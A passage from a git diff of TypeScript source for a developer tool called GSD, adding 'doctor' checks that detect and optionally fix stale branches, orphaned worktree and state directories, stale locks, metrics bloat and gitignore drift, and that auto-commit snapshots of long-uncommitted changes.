await loadFile(roadmapPath) : null; + if (!roadmapContent) continue; + const roadmap = parseLegacyRoadmap(roadmapContent); + branchMilestoneComplete = isMilestoneComplete(roadmap); + } + if (branchMilestoneComplete) { + issues.push({ + severity: "info", + code: "stale_milestone_branch", + scope: "milestone", + unitId: milestoneId, + message: `Branch ${branch} exists for completed milestone ${milestoneId}`, + fixable: true, + }); + + if (shouldFix("stale_milestone_branch")) { + try { + nativeBranchDelete(basePath, branch, true); + fixesApplied.push(`deleted stale branch ${branch}`); + } catch { + fixesApplied.push(`failed to delete branch ${branch}`); + } + } + } + } + } + } catch { + // git branch list failed — skip stale branch check + } + } catch { + // listWorktrees or deriveState failed — skip worktree/branch checks + } + } // end isolationMode !== "none" + + // ── Corrupt merge state ──────────────────────────────────────────────── + try { + const mergeStateFiles = ["MERGE_HEAD", "SQUASH_MSG"]; + const mergeStateDirs = ["rebase-apply", "rebase-merge"]; + const found: string[] = []; + + for (const f of mergeStateFiles) { + if (existsSync(join(gitDir, f))) found.push(f); + } + for (const d of mergeStateDirs) { + if (existsSync(join(gitDir, d))) found.push(d); + } + + if (found.length > 0) { + issues.push({ + severity: "error", + code: "corrupt_merge_state", + scope: "project", + unitId: "project", + message: `Corrupt merge/rebase state detected: ${found.join(", ")}`, + fixable: true, + }); + + if (shouldFix("corrupt_merge_state")) { + const result = abortAndReset(basePath); + fixesApplied.push(`cleaned merge state: ${result.cleaned.join(", ")}`); + } + } + } catch { + // Can't check .git dir — skip + } + + // ── Tracked runtime files ────────────────────────────────────────────── + try { + const trackedPaths: string[] = []; + for (const exclusion of RUNTIME_EXCLUSION_PATHS) { + try { + const files = nativeLsFiles(basePath, exclusion); + if (files.length > 0) { + 
trackedPaths.push(...files); + } + } catch { + // Individual ls-files can fail — continue + } + } + + if (trackedPaths.length > 0) { + issues.push({ + severity: "warning", + code: "tracked_runtime_files", + scope: "project", + unitId: "project", + message: `${trackedPaths.length} runtime file(s) are tracked by git: ${trackedPaths.slice(0, 5).join(", ")}${trackedPaths.length > 5 ? "..." : ""}`, + fixable: true, + }); + + if (shouldFix("tracked_runtime_files")) { + try { + for (const exclusion of RUNTIME_EXCLUSION_PATHS) { + nativeRmCached(basePath, [exclusion]); + } + fixesApplied.push(`untracked ${trackedPaths.length} runtime file(s)`); + } catch { + fixesApplied.push("failed to untrack runtime files"); + } + } + } + } catch { + // git ls-files failed — skip + } + + // ── Legacy slice branches ────────────────────────────────────────────── + try { + const branchList = nativeBranchList(basePath, "gsd/*/*") + .filter((branch) => !branch.startsWith("gsd/quick/")); + if (branchList.length > 0) { + issues.push({ + severity: "info", + code: "legacy_slice_branches", + scope: "project", + unitId: "project", + message: `${branchList.length} legacy slice branch(es) found: ${branchList.slice(0, 3).join(", ")}${branchList.length > 3 ? "..." : ""}. These are no longer used (branchless architecture).`, + fixable: true, + }); + + if (shouldFix("legacy_slice_branches")) { + let deleted = 0; + for (const branch of branchList) { + try { + nativeBranchDelete(basePath, branch, true); + deleted++; + } catch { /* skip branches that can't be deleted */ } + } + if (deleted > 0) { + fixesApplied.push(`deleted ${deleted} legacy slice branch(es)`); + } + } + } + } catch { + // git branch list failed — skip + } + + // ── Integration branch existence ────────────────────────────────────── + // For each active (non-complete) milestone, verify the stored integration + // branch still exists in git. 
A missing integration branch blocks merge-back + // and causes the next merge operation to fail silently. + try { + const state = await deriveState(basePath); + const gitPrefs = loadEffectiveGSDPreferences()?.preferences?.git ?? {}; + for (const milestone of state.registry) { + if (milestone.status === "complete") continue; + const resolution = resolveMilestoneIntegrationBranch(basePath, milestone.id, gitPrefs); + if (!resolution.recordedBranch) continue; // No stored branch — skip (not yet set) + if (resolution.status === "fallback" && resolution.effectiveBranch) { + issues.push({ + severity: "warning", + code: "integration_branch_missing", + scope: "milestone", + unitId: milestone.id, + message: resolution.reason, + fixable: true, + }); + if (shouldFix("integration_branch_missing")) { + writeIntegrationBranch(basePath, milestone.id, resolution.effectiveBranch); + fixesApplied.push(`updated integration branch for ${milestone.id} to "${resolution.effectiveBranch}"`); + } + continue; + } + + if (resolution.status === "missing") { + issues.push({ + severity: "error", + code: "integration_branch_missing", + scope: "milestone", + unitId: milestone.id, + message: resolution.reason, + fixable: false, + }); + } + } + } catch { + // Non-fatal — integration branch check failed + } + + // ── Orphaned worktree directories ──────────────────────────────────── + // Worktree removal can fail after a branch delete, leaving a directory + // that is no longer registered with git. These orphaned dirs cause + // "already exists" errors when re-creating the same worktree name. + try { + const wtDir = worktreesDir(basePath); + if (existsSync(wtDir)) { + // Resolve symlinks and normalize separators so that symlinked .gsd + // paths (e.g. ~/.gsd/projects//worktrees/…) match the paths + // returned by `git worktree list`. 
+ const normalizePath = (p: string): string => { + try { p = realpathSync(p); } catch { /* path may not exist */ } + return p.replaceAll("\\", "/"); + }; + const registeredPaths = new Set( + nativeWorktreeList(basePath).map(entry => normalizePath(entry.path)), + ); + for (const entry of readdirSync(wtDir)) { + const fullPath = join(wtDir, entry); + try { + if (!statSync(fullPath).isDirectory()) continue; + } catch { continue; } + const normalizedFullPath = normalizePath(fullPath); + if (!registeredPaths.has(normalizedFullPath)) { + // Skip directories that only contain doctor artifacts (.gsd/doctor-history.jsonl). + // appendDoctorHistory() can recreate these dirs during the audit itself, + // causing a circular false positive (#3105 Bug 1). + if (isDoctorArtifactOnly(fullPath)) continue; + issues.push({ + severity: "warning", + code: "worktree_directory_orphaned", + scope: "project", + unitId: entry, + message: `Worktree directory ${fullPath} exists on disk but is not registered with git. Run "git worktree prune" or doctor --fix to remove it.`, + fixable: true, + }); + if (shouldFix("worktree_directory_orphaned")) { + try { + rmSync(fullPath, { recursive: true, force: true }); + fixesApplied.push(`removed orphaned worktree directory ${fullPath}`); + } catch { + fixesApplied.push(`failed to remove orphaned worktree directory ${fullPath}`); + } + } + } + } + } + } catch { + // Non-fatal — orphaned worktree directory check failed + } + + // ── Stale uncommitted changes ──────────────────────────────────────────── + // If the working tree has uncommitted changes and the last commit was + // longer ago than the configured threshold, flag it and optionally + // auto-commit a safety snapshot so work isn't lost. + try { + const prefs = loadEffectiveGSDPreferences()?.preferences ?? {}; + const thresholdMinutes = prefs.stale_commit_threshold_minutes ?? 
30; + + if (thresholdMinutes > 0) { + const dirty = nativeHasChanges(basePath); + if (dirty) { + const branch = nativeGetCurrentBranch(basePath); + const lastEpoch = nativeLastCommitEpoch(basePath, branch || "HEAD"); + const nowEpoch = Math.floor(Date.now() / 1000); + const minutesSinceCommit = lastEpoch > 0 ? (nowEpoch - lastEpoch) / 60 : Infinity; + + if (minutesSinceCommit >= thresholdMinutes) { + const mins = Math.floor(minutesSinceCommit); + issues.push({ + severity: "warning", + code: "stale_uncommitted_changes", + scope: "project", + unitId: "project", + message: `Uncommitted changes detected with no commit in ${mins} minute${mins === 1 ? "" : "s"} (threshold: ${thresholdMinutes}m). Snapshotting uncommitted changes.`, + fixable: true, + }); + + if (shouldFix("stale_uncommitted_changes")) { + try { + nativeAddAllWithExclusions(basePath, RUNTIME_EXCLUSION_PATHS); + const commitMsg = `gsd snapshot: uncommitted changes after ${mins}m inactivity`; + const result = nativeCommit(basePath, commitMsg); + if (result) { + fixesApplied.push(`created gsd snapshot after ${mins}m of uncommitted changes`); + } else { + fixesApplied.push("gsd snapshot skipped — nothing to commit after staging changes"); + } + } catch { + fixesApplied.push("failed to create gsd snapshot commit"); + } + } + } + } + } + } catch { + // Non-fatal — stale commit check failed + } + + // ── Worktree lifecycle checks ────────────────────────────────────────── + // Check GSD-managed worktrees for: merged branches, stale work, dirty + // state, and unpushed commits. Only worktrees under .gsd/worktrees/. 
+ try { + const healthStatuses = getAllWorktreeHealth(basePath); + const cwd = process.cwd(); + + for (const health of healthStatuses) { + const wt = health.worktree; + const isCwd = wt.path === cwd || cwd.startsWith(wt.path + sep); + + // Branch fully merged into main — safe to remove + if (health.mergedIntoMain) { + issues.push({ + severity: "info", + code: "worktree_branch_merged", + scope: "project", + unitId: wt.name, + message: `Worktree "${wt.name}" (branch ${wt.branch}) is fully merged into main${health.safeToRemove ? " — safe to remove" : ""}`, + fixable: health.safeToRemove, + }); + + if (health.safeToRemove && shouldFix("worktree_branch_merged") && !isCwd) { + try { + const { removeWorktree } = await import("./worktree-manager.js"); + removeWorktree(basePath, wt.name, { deleteBranch: true, branch: wt.branch }); + fixesApplied.push(`removed merged worktree "${wt.name}" and deleted branch ${wt.branch}`); + } catch { + fixesApplied.push(`failed to remove merged worktree "${wt.name}"`); + } + } + // If merged, skip the stale/dirty/unpushed checks — they're irrelevant + continue; + } + + // Stale: no commits in N days, not merged + if (health.stale) { + const days = Math.floor(health.lastCommitAgeDays); + issues.push({ + severity: "warning", + code: "worktree_stale", + scope: "project", + unitId: wt.name, + message: `Worktree "${wt.name}" has had no commits in ${days} day${days === 1 ? "" : "s"}`, + fixable: false, + }); + } + + // Dirty: uncommitted changes in a worktree (only flag on stale worktrees to avoid noise) + if (health.dirty && health.stale) { + issues.push({ + severity: "warning", + code: "worktree_dirty", + scope: "project", + unitId: wt.name, + message: `Worktree "${wt.name}" has ${health.dirtyFileCount} uncommitted file${health.dirtyFileCount === 1 ? 
"" : "s"} and is stale`, + fixable: false, + }); + } + + // Unpushed: commits not on any remote (only flag on stale worktrees to avoid noise) + if (health.unpushedCommits > 0 && health.stale) { + issues.push({ + severity: "warning", + code: "worktree_unpushed", + scope: "project", + unitId: wt.name, + message: `Worktree "${wt.name}" has ${health.unpushedCommits} unpushed commit${health.unpushedCommits === 1 ? "" : "s"}`, + fixable: false, + }); + } + } + } catch { + // Non-fatal — worktree lifecycle check failed + } +} diff --git a/src/resources/extensions/gsd/doctor-global-checks.ts b/src/resources/extensions/gsd/doctor-global-checks.ts new file mode 100644 index 000000000..cc181910a --- /dev/null +++ b/src/resources/extensions/gsd/doctor-global-checks.ts @@ -0,0 +1,84 @@ +import { existsSync, readdirSync, rmSync } from "node:fs"; +import { join } from "node:path"; + +import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js"; +import { readRepoMeta, externalProjectsRoot } from "./repo-identity.js"; + +/** + * Check for orphaned project state directories in ~/.gsd/projects/. + * + * A project directory is orphaned when its recorded gitRoot no longer exists + * on disk — the repo was deleted, moved, or the external drive was unmounted. + * These directories accumulate silently and waste disk space. + * + * Severity: info — orphaned state is harmless but takes disk space. + * Fixable: yes — rmSync the directory. Never auto-fixed at fixLevel="task". 
+ */ +export async function checkGlobalHealth( + issues: DoctorIssue[], + fixesApplied: string[], + shouldFix: (code: DoctorIssueCode) => boolean, +): Promise { + try { + const projectsDir = externalProjectsRoot(); + + if (!existsSync(projectsDir)) return; + + let entries: string[]; + try { + entries = readdirSync(projectsDir, { withFileTypes: true }) + .filter(e => e.isDirectory()) + .map(e => e.name); + } catch { + return; // Can't read directory — skip + } + + if (entries.length === 0) return; + + const orphaned: Array<{ hash: string; gitRoot: string; remoteUrl: string }> = []; + let unknownCount = 0; + + for (const hash of entries) { + const dirPath = join(projectsDir, hash); + const meta = readRepoMeta(dirPath); + if (!meta) { + unknownCount++; + continue; + } + if (!existsSync(meta.gitRoot)) { + orphaned.push({ hash, gitRoot: meta.gitRoot, remoteUrl: meta.remoteUrl }); + } + } + + if (orphaned.length === 0) return; + + const labels = orphaned.slice(0, 3).map(o => o.gitRoot).join(", "); + const overflow = orphaned.length > 3 ? ` (+${orphaned.length - 3} more)` : ""; + const unknownNote = unknownCount > 0 ? ` — ${unknownCount} additional director${unknownCount === 1 ? "y" : "ies"} have no metadata yet (open those repos once to register them)` : ""; + + issues.push({ + severity: "info", + code: "orphaned_project_state", + scope: "project", + unitId: "global", + message: `${orphaned.length} orphaned GSD project state director${orphaned.length === 1 ? "y" : "ies"} in ${projectsDir} whose git root no longer exists: ${labels}${overflow}${unknownNote}. 
Run /gsd cleanup projects to audit or /gsd cleanup projects --fix to reclaim disk space.`, + file: projectsDir, + fixable: true, + }); + + if (shouldFix("orphaned_project_state")) { + let removed = 0; + for (const { hash } of orphaned) { + try { + rmSync(join(projectsDir, hash), { recursive: true, force: true }); + removed++; + } catch { + // Individual removal failure is non-fatal — continue with remaining + } + } + fixesApplied.push(`removed ${removed} orphaned project state director${removed === 1 ? "y" : "ies"} from ${projectsDir}`); + } + } catch { + // Non-fatal — global health check must not block per-project doctor + } +} diff --git a/src/resources/extensions/gsd/doctor-proactive.ts b/src/resources/extensions/gsd/doctor-proactive.ts index 0eb3b016f..20beae148 100644 --- a/src/resources/extensions/gsd/doctor-proactive.ts +++ b/src/resources/extensions/gsd/doctor-proactive.ts @@ -21,8 +21,8 @@ import { readCrashLock, isLockProcessAlive, clearLock } from "./crash-recovery.j import { abortAndReset } from "./git-self-heal.js"; import { rebuildState } from "./doctor.js"; import { deriveState } from "./state.js"; -import { resolveMilestoneIntegrationBranch } from "./git-service.js"; -import { nativeIsRepo } from "./native-git-bridge.js"; +import { RUNTIME_EXCLUSION_PATHS, resolveMilestoneIntegrationBranch } from "./git-service.js"; +import { nativeIsRepo, nativeHasChanges, nativeLastCommitEpoch, nativeGetCurrentBranch, nativeAddAllWithExclusions, nativeCommit } from "./native-git-bridge.js"; import { loadEffectiveGSDPreferences } from "./preferences.js"; import { runEnvironmentChecks } from "./doctor-environment.js"; @@ -295,6 +295,40 @@ export async function preDispatchHealthGate(basePath: string): Promise 0 && nativeHasChanges(basePath)) { + const branch = nativeGetCurrentBranch(basePath); + const lastEpoch = nativeLastCommitEpoch(basePath, branch || "HEAD"); + const nowEpoch = Math.floor(Date.now() / 1000); + const minutesSinceCommit = lastEpoch > 0 ? 
(nowEpoch - lastEpoch) / 60 : Infinity; + + if (minutesSinceCommit >= thresholdMinutes) { + const mins = Math.floor(minutesSinceCommit); + try { + nativeAddAllWithExclusions(basePath, RUNTIME_EXCLUSION_PATHS); + const commitMsg = `gsd snapshot: pre-dispatch, uncommitted changes after ${mins}m inactivity`; + const result = nativeCommit(basePath, commitMsg); + if (result) { + fixesApplied.push(`pre-dispatch: created gsd snapshot after ${mins}m of uncommitted changes`); + } + } catch { + // Non-blocking — snapshot failed but dispatch can continue + fixesApplied.push("pre-dispatch: gsd snapshot failed"); + } + } + } + } + } catch { + // Non-fatal + } + // ── Disk space check ── // Catches low-disk conditions before dispatch rather than letting the unit // fail mid-execution with ENOSPC (which wastes a full LLM turn). diff --git a/src/resources/extensions/gsd/doctor-providers.ts b/src/resources/extensions/gsd/doctor-providers.ts index a06a5c307..e0f35341b 100644 --- a/src/resources/extensions/gsd/doctor-providers.ts +++ b/src/resources/extensions/gsd/doctor-providers.ts @@ -181,7 +181,8 @@ function resolveKey(providerId: string): KeyLookup { */ const PROVIDER_ROUTES: Record = { anthropic: ["github-copilot"], - openai: ["github-copilot"], + openai: ["github-copilot", "openai-codex"], + google: ["google-gemini-cli"], }; function checkLlmProviders(): ProviderCheckResult[] { @@ -305,11 +306,24 @@ function checkOptionalProviders(): ProviderCheckResult[] { const optional = ["brave", "tavily", "jina", "context7"] as const; const results: ProviderCheckResult[] = []; + // Determine which search providers are configured so we can suppress + // "not configured" noise for alternative search providers when at least + // one is already active (e.g. don't warn about missing BRAVE_API_KEY + // when Tavily is configured). 
+ const searchProviderIds = ["brave", "tavily"] as const; + const hasAnySearchProvider = searchProviderIds.some(id => resolveKey(id).found); + for (const providerId of optional) { const info = PROVIDER_REGISTRY.find(p => p.id === providerId); if (!info) continue; const lookup = resolveKey(providerId); + + // Skip unconfigured search providers when another search provider is active + if (!lookup.found && hasAnySearchProvider && info.category === "search") { + continue; + } + results.push({ name: providerId, label: info.label, diff --git a/src/resources/extensions/gsd/doctor-runtime-checks.ts b/src/resources/extensions/gsd/doctor-runtime-checks.ts new file mode 100644 index 000000000..d2af2bd9a --- /dev/null +++ b/src/resources/extensions/gsd/doctor-runtime-checks.ts @@ -0,0 +1,627 @@ +import { existsSync, lstatSync, readdirSync, readFileSync, realpathSync, rmSync, statSync } from "node:fs"; +import { basename, dirname, join } from "node:path"; + +import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js"; +import { cleanNumberedGsdVariants } from "./repo-identity.js"; +import { milestonesDir, gsdRoot, resolveGsdRootFile } from "./paths.js"; +import { deriveState } from "./state.js"; +import { saveFile } from "./files.js"; +import { nativeIsRepo, nativeForEachRef, nativeUpdateRef } from "./native-git-bridge.js"; +import { readCrashLock, isLockProcessAlive, clearLock } from "./crash-recovery.js"; +import { ensureGitignore } from "./gitignore.js"; +import { readAllSessionStatuses, isSessionStale, removeSessionStatus } from "./session-status-io.js"; +import { recoverFailedMigration } from "./migrate-external.js"; + +export async function checkRuntimeHealth( + basePath: string, + issues: DoctorIssue[], + fixesApplied: string[], + shouldFix: (code: DoctorIssueCode) => boolean, +): Promise { + const root = gsdRoot(basePath); + + // ── Stale crash lock ────────────────────────────────────────────────── + try { + const lock = readCrashLock(basePath); + if (lock) { 
+ const alive = isLockProcessAlive(lock); + if (!alive) { + issues.push({ + severity: "error", + code: "stale_crash_lock", + scope: "project", + unitId: "project", + message: `Stale auto.lock from PID ${lock.pid} (started ${lock.startedAt}, was executing ${lock.unitType} ${lock.unitId}) — process is no longer running`, + file: ".gsd/auto.lock", + fixable: true, + }); + + if (shouldFix("stale_crash_lock")) { + clearLock(basePath); + fixesApplied.push("cleared stale auto.lock"); + } + } + } + } catch { + // Non-fatal — crash lock check failed + } + + // ── Stranded lock directory ──────────────────────────────────────────── + // proper-lockfile creates a `.gsd.lock/` directory as the OS-level lock + // mechanism. If the process was SIGKILLed or crashed hard, this directory + // can remain on disk without any live process holding it. The next session + // fails to acquire the lock until the directory is removed (#1245). + try { + const lockDir = join(dirname(root), `${basename(root)}.lock`); + if (existsSync(lockDir)) { + const statRes = statSync(lockDir); + if (statRes.isDirectory()) { + // Check if any live process actually holds this lock + const lock = readCrashLock(basePath); + const lockHolderAlive = lock ? isLockProcessAlive(lock) : false; + if (!lockHolderAlive) { + issues.push({ + severity: "error", + code: "stranded_lock_directory", + scope: "project", + unitId: "project", + message: `Stranded lock directory "${lockDir}" exists but no live process holds the session lock. 
This blocks new auto-mode sessions from starting.`, + file: lockDir, + fixable: true, + }); + if (shouldFix("stranded_lock_directory")) { + try { + rmSync(lockDir, { recursive: true, force: true }); + fixesApplied.push(`removed stranded lock directory ${lockDir}`); + } catch { + fixesApplied.push(`failed to remove stranded lock directory ${lockDir}`); + } + } + } + } + } + } catch { + // Non-fatal — stranded lock directory check failed + } + + // ── Stale parallel sessions ──────────────────────────────────────────── + try { + const parallelStatuses = readAllSessionStatuses(basePath); + for (const status of parallelStatuses) { + if (isSessionStale(status)) { + issues.push({ + severity: "warning", + code: "stale_parallel_session", + scope: "project", + unitId: status.milestoneId, + message: `Stale parallel session for ${status.milestoneId} (PID ${status.pid}, started ${new Date(status.startedAt).toISOString()}, last heartbeat ${new Date(status.lastHeartbeat).toISOString()}) — process is no longer running`, + file: `.gsd/parallel/${status.milestoneId}.status.json`, + fixable: true, + }); + + if (shouldFix("stale_parallel_session")) { + removeSessionStatus(basePath, status.milestoneId); + fixesApplied.push(`cleaned up stale parallel session for ${status.milestoneId}`); + } + } + } + } catch { + // Non-fatal — parallel session check failed + } + + // ── Orphaned completed-units keys ───────────────────────────────────── + try { + const completedKeysFile = join(root, "completed-units.json"); + if (existsSync(completedKeysFile)) { + const raw = readFileSync(completedKeysFile, "utf-8"); + const keys: string[] = JSON.parse(raw); + const orphaned: string[] = []; + + for (const key of keys) { + // Key format: "unitType/unitId" e.g. 
"execute-task/M001/S01/T01" + // Hook units have compound types: "hook//unitId" + const { splitCompletedKey } = await import("./forensics.js"); + const parsed = splitCompletedKey(key); + if (!parsed) continue; + const { unitType, unitId } = parsed; + + // Only validate artifact-producing unit types + const { verifyExpectedArtifact } = await import("./auto-recovery.js"); + if (!verifyExpectedArtifact(unitType, unitId, basePath)) { + orphaned.push(key); + } + } + + if (orphaned.length > 0) { + issues.push({ + severity: "warning", + code: "orphaned_completed_units", + scope: "project", + unitId: "project", + message: `${orphaned.length} completed-unit key(s) reference missing artifacts: ${orphaned.slice(0, 3).join(", ")}${orphaned.length > 3 ? "..." : ""}`, + file: ".gsd/completed-units.json", + fixable: true, + }); + + if (shouldFix("orphaned_completed_units")) { + const orphanedSet = new Set(orphaned); + const remaining = keys.filter((key) => !orphanedSet.has(key)); + await saveFile(completedKeysFile, JSON.stringify(remaining)); + fixesApplied.push(`removed ${orphaned.length} orphaned completed-unit key(s)`); + } + } + } + } catch { + // Non-fatal — completed-units check failed + } + + // ── Stale hook state ────────────────────────────────────────────────── + try { + const hookStateFile = join(root, "hook-state.json"); + if (existsSync(hookStateFile)) { + const raw = readFileSync(hookStateFile, "utf-8"); + const state = JSON.parse(raw); + const hasCycleCounts = state.cycleCounts && typeof state.cycleCounts === "object" + && Object.keys(state.cycleCounts).length > 0; + + // Only flag if there are actual cycle counts AND no auto-mode is running + if (hasCycleCounts) { + const lock = readCrashLock(basePath); + const autoRunning = lock ? 
isLockProcessAlive(lock) : false; + + if (!autoRunning) { + issues.push({ + severity: "info", + code: "stale_hook_state", + scope: "project", + unitId: "project", + message: `hook-state.json has ${Object.keys(state.cycleCounts).length} residual cycle count(s) from a previous session`, + file: ".gsd/hook-state.json", + fixable: true, + }); + + if (shouldFix("stale_hook_state")) { + const { clearPersistedHookState } = await import("./post-unit-hooks.js"); + clearPersistedHookState(basePath); + fixesApplied.push("cleared stale hook-state.json"); + } + } + } + } + } catch { + // Non-fatal — hook state check failed + } + + // ── Activity log bloat ──────────────────────────────────────────────── + try { + const activityDir = join(root, "activity"); + if (existsSync(activityDir)) { + const files = readdirSync(activityDir); + let totalSize = 0; + for (const f of files) { + try { + totalSize += statSync(join(activityDir, f)).size; + } catch { + // stat failed — skip + } + } + + const totalMB = totalSize / (1024 * 1024); + const BLOAT_FILE_THRESHOLD = 500; + const BLOAT_SIZE_MB = 100; + + if (files.length > BLOAT_FILE_THRESHOLD || totalMB > BLOAT_SIZE_MB) { + issues.push({ + severity: "warning", + code: "activity_log_bloat", + scope: "project", + unitId: "project", + message: `Activity logs: ${files.length} files, ${totalMB.toFixed(1)}MB (thresholds: ${BLOAT_FILE_THRESHOLD} files / ${BLOAT_SIZE_MB}MB)`, + file: ".gsd/activity/", + fixable: true, + }); + + if (shouldFix("activity_log_bloat")) { + const { pruneActivityLogs } = await import("./activity-log.js"); + pruneActivityLogs(activityDir, 7); // 7-day retention + fixesApplied.push("pruned activity logs (7-day retention)"); + } + } + } + } catch { + // Non-fatal — activity log check failed + } + + // ── STATE.md health ─────────────────────────────────────────────────── + try { + const stateFilePath = resolveGsdRootFile(basePath, "STATE"); + const milestonesPath = milestonesDir(basePath); + + if 
(existsSync(milestonesPath)) { + if (!existsSync(stateFilePath)) { + issues.push({ + severity: "warning", + code: "state_file_missing", + scope: "project", + unitId: "project", + message: "STATE.md is missing — state display will not work", + file: ".gsd/STATE.md", + fixable: true, + }); + + if (shouldFix("state_file_missing")) { + const state = await deriveState(basePath); + await saveFile(stateFilePath, buildStateMarkdownForCheck(state)); + fixesApplied.push("created STATE.md from derived state"); + } + } else { + // Check if STATE.md is stale by comparing active milestone/slice/phase + const currentContent = readFileSync(stateFilePath, "utf-8"); + const state = await deriveState(basePath); + const freshContent = buildStateMarkdownForCheck(state); + + // Extract key fields for comparison — don't compare full content + // since timestamp/formatting differences are normal + const extractFields = (content: string) => { + const milestone = content.match(/\*\*Active Milestone:\*\*\s*(.+)/)?.[1]?.trim() ?? ""; + const slice = content.match(/\*\*Active Slice:\*\*\s*(.+)/)?.[1]?.trim() ?? ""; + const phase = content.match(/\*\*Phase:\*\*\s*(.+)/)?.[1]?.trim() ?? 
""; + return { milestone, slice, phase }; + }; + + const current = extractFields(currentContent); + const fresh = extractFields(freshContent); + + if (current.milestone !== fresh.milestone || current.slice !== fresh.slice || current.phase !== fresh.phase) { + issues.push({ + severity: "warning", + code: "state_file_stale", + scope: "project", + unitId: "project", + message: `STATE.md is stale — shows "${current.phase}" but derived state is "${fresh.phase}"`, + file: ".gsd/STATE.md", + fixable: true, + }); + + if (shouldFix("state_file_stale")) { + await saveFile(stateFilePath, freshContent); + fixesApplied.push("rebuilt STATE.md from derived state"); + } + } + } + } + } catch { + // Non-fatal — STATE.md check failed + } + + // ── Gitignore drift ─────────────────────────────────────────────────── + try { + const gitignorePath = join(basePath, ".gitignore"); + if (existsSync(gitignorePath) && nativeIsRepo(basePath)) { + const content = readFileSync(gitignorePath, "utf-8"); + const existingLines = new Set( + content.split("\n").map(l => l.trim()).filter(l => l && !l.startsWith("#")), + ); + + // Check for critical runtime patterns that must be present + const criticalPatterns = [ + ".gsd/activity/", + ".gsd/runtime/", + ".gsd/auto.lock", + ".gsd/gsd.db", + ".gsd/completed-units.json", + ]; + + // If blanket .gsd/ or .gsd is present, all patterns are covered + const hasBlanketIgnore = existingLines.has(".gsd/") || existingLines.has(".gsd"); + + if (!hasBlanketIgnore) { + const missing = criticalPatterns.filter(p => !existingLines.has(p)); + if (missing.length > 0) { + issues.push({ + severity: "warning", + code: "gitignore_missing_patterns", + scope: "project", + unitId: "project", + message: `${missing.length} critical GSD runtime pattern(s) missing from .gitignore: ${missing.join(", ")}`, + file: ".gitignore", + fixable: true, + }); + + if (shouldFix("gitignore_missing_patterns")) { + ensureGitignore(basePath); + fixesApplied.push("added missing GSD runtime patterns 
to .gitignore"); + } + } + } + } + } catch { + // Non-fatal — gitignore check failed + } + + // ── External state symlink health ────────────────────────────────────── + try { + const localGsd = join(basePath, ".gsd"); + if (existsSync(localGsd)) { + const stat = lstatSync(localGsd); + + // Check for .gsd.migrating (failed migration) + const migratingPath = join(basePath, ".gsd.migrating"); + if (existsSync(migratingPath)) { + issues.push({ + severity: "error", + code: "failed_migration", + scope: "project", + unitId: "project", + message: "Found .gsd.migrating — a previous external state migration failed. State may be incomplete.", + file: ".gsd.migrating", + fixable: true, + }); + + if (shouldFix("failed_migration")) { + if (recoverFailedMigration(basePath)) { + fixesApplied.push("recovered failed migration (.gsd.migrating → .gsd)"); + } + } + } + + // Check symlink target exists + if (stat.isSymbolicLink()) { + try { + realpathSync(localGsd); + } catch { + issues.push({ + severity: "error", + code: "broken_symlink", + scope: "project", + unitId: "project", + message: ".gsd symlink target does not exist. External state directory may have been deleted.", + file: ".gsd", + fixable: false, + }); + } + } + } + } catch { + // Non-fatal — external state check failed + } + + // ── Numbered .gsd collision variants (#2205) ─────────────────────────── + // macOS APFS can create ".gsd 2", ".gsd 3" etc. when a directory blocks + // symlink creation. These must be removed so the canonical .gsd is used. 
+ try { + const variantPattern = /^\.gsd \d+$/; + const entries = readdirSync(basePath); + const variants = entries.filter(e => variantPattern.test(e)); + if (variants.length > 0) { + for (const v of variants) { + issues.push({ + severity: "warning", + code: "numbered_gsd_variant", + scope: "project", + unitId: "project", + message: `Found macOS collision variant "${v}" — this can cause GSD state to appear deleted.`, + file: v, + fixable: true, + }); + } + + if (shouldFix("numbered_gsd_variant")) { + const removed = cleanNumberedGsdVariants(basePath); + for (const name of removed) { + fixesApplied.push(`removed numbered .gsd variant: ${name}`); + } + } + } + } catch { + // Non-fatal — variant check failed + } + + // ── Metrics ledger integrity ─────────────────────────────────────────── + try { + const metricsPath = join(root, "metrics.json"); + if (existsSync(metricsPath)) { + try { + const raw = readFileSync(metricsPath, "utf-8"); + const ledger = JSON.parse(raw); + if (ledger.version !== 1 || !Array.isArray(ledger.units)) { + issues.push({ + severity: "warning", + code: "metrics_ledger_corrupt", + scope: "project", + unitId: "project", + message: "metrics.json has an unexpected structure (version !== 1 or units is not an array) — metrics data may be unreliable", + file: ".gsd/metrics.json", + fixable: false, + }); + } + } catch { + issues.push({ + severity: "warning", + code: "metrics_ledger_corrupt", + scope: "project", + unitId: "project", + message: "metrics.json is not valid JSON — metrics data may be corrupt", + file: ".gsd/metrics.json", + fixable: false, + }); + } + } + } catch { + // Non-fatal — metrics check failed + } + + // ── Metrics ledger bloat ────────────────────────────────────────────── + // The metrics ledger has no TTL and grows by one entry per completed unit. + // At 50 units/day a project can accumulate tens of thousands of entries over + // months of use. Prune to the newest 1500 when the threshold is exceeded. 
+ try { + const metricsFilePath = join(root, "metrics.json"); + if (existsSync(metricsFilePath)) { + try { + const raw = readFileSync(metricsFilePath, "utf-8"); + const parsed = JSON.parse(raw); + const BLOAT_UNITS_THRESHOLD = 2000; + if (parsed.version === 1 && Array.isArray(parsed.units) && parsed.units.length > BLOAT_UNITS_THRESHOLD) { + const fileSizeMB = (statSync(metricsFilePath).size / (1024 * 1024)).toFixed(1); + issues.push({ + severity: "warning", + code: "metrics_ledger_bloat", + scope: "project", + unitId: "project", + message: `metrics.json has ${parsed.units.length} unit entries (${fileSizeMB}MB) — threshold is ${BLOAT_UNITS_THRESHOLD}. Run /gsd doctor --fix to prune to the newest 1500 entries.`, + file: ".gsd/metrics.json", + fixable: true, + }); + if (shouldFix("metrics_ledger_bloat")) { + const { pruneMetricsLedger } = await import("./metrics.js"); + const removed = pruneMetricsLedger(basePath, 1500); + fixesApplied.push(`pruned metrics ledger: removed ${removed} oldest entries (${parsed.units.length - removed} remain)`); + } + } + } catch { + // JSON parse failed — already handled by the integrity check above + } + } + } catch { + // Non-fatal — metrics bloat check failed + } + + // ── Large planning file detection ────────────────────────────────────── + // Files over 100KB can cause LLM context pressure. Report the worst offenders. 
